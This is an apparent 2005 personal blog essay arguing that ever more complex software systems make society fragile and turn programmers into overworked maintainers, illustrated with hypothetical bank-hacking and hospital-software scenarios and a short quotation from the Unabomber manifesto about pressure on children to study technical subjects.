A New Distopian Vision

I’ve been thinking a lot lately about the course we are traveling on. This bright new century, issued in with hype and promise, stunted awake by tragedy, then slowly rising, bleary eyed, mildly confident, etcetera.

There’s the promise of a digital reawakening, the remaking of the media through bloggers and the internet, the morphing of media distribution, battles over intellectual property and copyright.

But a lot of people are missing the underlying infrastructure required to put all this together. Glossing over the details. Of course there’s the internet, with miles of wires, millions of routers and servers spitting out packets and requests. But all that code comes from somewhere. Whether its a hardworking college grad weaving through spaghetti code or the hardworking offshore Indian replacement doing the same.

But the internet is not magic. Maybe some of the content and behavior of the internet is emergent – but none of the code is. Every single line was either copied or written by hand. Integrated with legacy products, interfaced with various protocols and implementations.

The magic transparency of the internet appears because there are so many bodies and mind keeping it working. Server maintenance, upgrades. Memory leaks and power failures and glitches. Malicious hacker attacks. The magic of the internet requires armies of workers to keep it running smoothly.

Back when it was just html pages, geocities sites of summer camp, warez newsgroups, video dumps of porn – it wasn’t that big of a deal. So what if a server goes down or you get page errors. The internet was just a fun little toy, a novelty. Not everything worked all the time. It was the result of thousands of tinkers and armchair architects – the flaws were part of the draw.

But now the net is bigtime. In every facet of industry – online stores, banking, billpay, data exchange, medical reference, investing. These are big industries with boatloads of money and a yearning to tap into the “ease” of network technologies.

But the ease is somewhat of a misnomer. A misconception.

Example: Lets say I’m a software company hired to design a new online banking portal for a large International Bank. I have my team of programmers, database experts, networking consultants, even banking execs who give me detailed specs on the system. Eighteen months later the thing is done and it’s a hit. The bank cuts down on operating costs by a noticeable percentage, investment is up, staffing costs are lowered, everyone is happy.

Then a hacker hits, steals 10000 records of data. The hole is plugged, the bug fixed, but the damage is done. Damage perhaps orders of magnitude larger than any bank robbery.

But lets say that the system was airtight – no way a hacker could get in and compromise the data. Things are going swell and Joey, the college intern, is hired to spruce up the login User interface. Most of it is ASP pages, (maybe PHP if the bank is feeling open-source inclined), drawing the frames with a pretty style sheet, forwarding the login data to a database stored procedure. Elementary stuff.

After his manager goes home, Joey decides to get extracurricular and add a nice feature – a cookie to remember the login information. He looks up some basic code on google – remembering passwords through cookies, implements the change in a few hours, throws the update on the live system, emails his manager and clocks out.

That night the a 16 year old Russian kid figures out the cookie scheme, jots out a short post on his private IRC channel, and in five hours another 10,000 records are lost via cookie spoofing.

Of course, this is an extreme example. Any bank that lets dumb college interns named Joey mess with Live production code deserves to have their system compromised.

But the only solution is more diligence. More experienced workers, putting in more hours, creating more code-handling bureaucracy and more policies of operation.

Like the butterfly effect – the smallest change/glitch/problem can be magnified in a large complex system. The catch-22 is this: As systems become more complex, they require more diligence and expertise to maintain, leading to yet more complexity.

As we become more tied into the system – each and every failure of the system hurts us more. When a horny middle school kid couldn’t find the latest Playboy scans, no one died. But when the router code that handles the messaging of medical devices has a logic error – people could die. Look at the Therac-25. That’s a single machine that was running a single piece of code. It wasn’t on a network. This was back in 1986. It’s 2005 and we still have momentous software glitches and errors: in the medical industry, in banking, in personal data, in entertainment.

And that’s the nightmare. As these technologies become more and more integrated into our lives, the problems will dig even deeper. Either we will suffer or the programmers will suffer. For very intricate systems – these bugs can only be solved by one or two people. The experts of the code.

Spaghetti code is unrecoverable – it must be recreated from scratch to remove cruft, bloat, glitches and holes. Remaking our information infrastructure every two to five years is an enormous undertaking. For every flaw that discovered during the redesign – more are bound to pop up. Our brains just aren’t wired to encompass every detail of computer code. Mistakes are bound to be made.

That’s why I’m wary of those who see information technology growing exponentially, eventually to explode into some sort of Singularity. They’re the technologists, the futurists, the transhumanists. It’s an interesting creed. “Eventually our brilliance will become as bright as the sun, and we will become gods.”

Keep dreaming, because from someone down in the trenches, I’m beginning to envision something more closely resembling this luddite’s prophecies. Aside from his predilection for mountain cabins and pipe-bombs, the Unabomber had some interesting things to say in his manifesto:

<br></br>
115. The system HAS TO force people to behave in ways that are increasingly remote from the natural pattern of human behavior. For example, the system needs scientists, mathematicians and engineers. It can't function without them. So heavy pressure is put on children to excel in these fields. It isn't natural for an adolescent human being to spend the bulk of his time sitting at a desk absorbed in study. A normal adolescent wants to spend his time in active contact with the real world. Among primitive peoples the things that children are trained to do are in natural harmony with natural human impulses. Among the American Indians, for example, boys were trained in active outdoor pursuits -- just the sort of things that boys like. But in our society children are pushed into studying technical subjects, which most do grudgingly.<br></br>```

As our society and needs become increasingly abstracted – human impulses and intuition will grow less effective in solving problems. Dealing with a physical world and biological needs – our impulses are useful. Using our five senses and reasoning power to directly affect our situation.

In effect, as systems take over more of our daily lives, we must jump through hoops and perform mathematical feats to accomplish the same thing. Unless this loss of this “intuitive gift” can be rectified, humans are required to “brute force” problems. This severely hampers the promise of any exponential growth or progress. The attrition is killer.

**Homogeneity leads to infection**: if a single system is made to handle everything, a single bug will infect everything.

**Heterogeneity leads to interfacing problems**: for every system that must interact, overhead is required – in time, manpower, and infrastructure.

That is the dilemma of innovation.

**Here’s another example**: A very intelligent, driven and dedicated young man designs software to handle all the medical machinery of a hospital. Specifically, the part of the software he wrote handles the dosage of IV drips and medical readouts. He carries a blackberry to be in constant communication with the hospital (and his programmer staff) if problems arise. He can remotely change the code from his home or out of town from his laptop. He makes without a doubt serious fuck-you money.

But he also carries chains and manacles – his laptop and cellphone. Essentially he works twenty four hour days. His work is always on his mind, and he always must be prepared to perform intellectual gymnastics to debug the problem (under a time frame) to get things working again.

If he fails, not only will he lose his money and his company, he’ll be fined thousands or even millions for endangering medical patients.

Is this really making life easier? Is this really the bright eyed world of the future? Or is it a desperate future, a hint of the distopia yet to come, servitude to the intricate architecture of the circuit board, slave to miles of code and the chaos held within.